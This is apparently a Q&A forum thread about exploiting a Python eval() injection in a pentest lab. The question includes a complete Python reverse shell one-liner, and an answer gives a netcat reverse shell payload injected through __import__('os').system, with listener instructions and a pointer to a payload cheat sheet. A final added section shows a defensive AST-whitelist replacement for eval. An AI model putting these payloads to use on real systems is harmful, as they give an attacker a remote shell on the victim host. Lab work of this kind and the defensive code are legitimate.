
I am working on a pentest lab. There is a Python eval() function I need to exploit.

It is like

eval('%s>1',payload)

I need to execute a Python reverse shell script as payload. It is

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I am trying something like

eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")

Not sure how to import all those modules and execute it.

Any help appreciated.

2 Answers

2

Maybe try like this

"__import__('os').system('nc your_ip port -e /bin/sh')"

like:

First, listen on the port in a fresh terminal:

nc -lvp 1234

then, in another terminal, try:

"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"

"__import__('os').system('YOUR REVERSE SHELL METHOD')"

Here are many reverse shell payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

good luck


2 Comments

I need to use Python reverse shell.
Did you check PayloadsAllTheThings?
0

Try to include globals() and locals() in the eval (to import into the global scope). This is explained in "In Python, why doesn't an import in an exec in a function work?"

Also see https://lucumr.pocoo.org/2011/2/1/exec-in-python/, chapter "Behind the Scenes of Imports".

1 Comment

eval doesn't allow ; and \n
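The defensive counterpart to the pattern in the question, added here and not taken from the question or either answer: rather than formatting an untrusted string into eval('%s>1' % payload), parse it with the ast module and evaluate only a whitelist of numeric nodes, so any expression built around __import__, an attribute lookup or a call is refused before anything runs. The names safe_greater_than_one, _eval_node and rejects are my own.

```python
import ast
import operator

# Added example (not code from the question or answers): a safe replacement
# for eval('%s>1' % payload). The untrusted string is parsed into an AST and
# only numeric literals, arithmetic and a single comparison are permitted.
# Call, Attribute, Name, Subscript, BoolOp, etc. (everything a payload like
# "__import__('os').system(...)" needs) raise ValueError unevaluated.

_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}
_CMPOPS = {ast.Gt: operator.gt, ast.Lt: operator.lt, ast.GtE: operator.ge,
           ast.LtE: operator.le, ast.Eq: operator.eq, ast.NotEq: operator.ne}


def _eval_node(node):
    """Evaluate a small whitelisted subset of expression nodes (Python 3.8+ AST)."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval_node(node.operand)
    if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
        return _BINOPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.Compare) and len(node.ops) == 1 \
            and type(node.ops[0]) in _CMPOPS:
        return _CMPOPS[type(node.ops[0])](_eval_node(node.left),
                                          _eval_node(node.comparators[0]))
    # Anything not listed above is refused without being evaluated.
    raise ValueError("disallowed expression node: %s" % type(node).__name__)


def safe_greater_than_one(payload):
    """Safe stand-in for eval('%s>1' % payload): True/False for a numeric
    expression, ValueError for disallowed nodes, SyntaxError if the input is
    not a single expression (e.g. it contains ';' or a newline)."""
    tree = ast.parse("%s>1" % payload, mode="eval")
    return bool(_eval_node(tree.body))


def rejects(payload):
    """True if the payload is refused, i.e. no user-controlled code ran."""
    try:
        safe_greater_than_one(payload)
    except (ValueError, SyntaxError):
        return True
    return False
```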
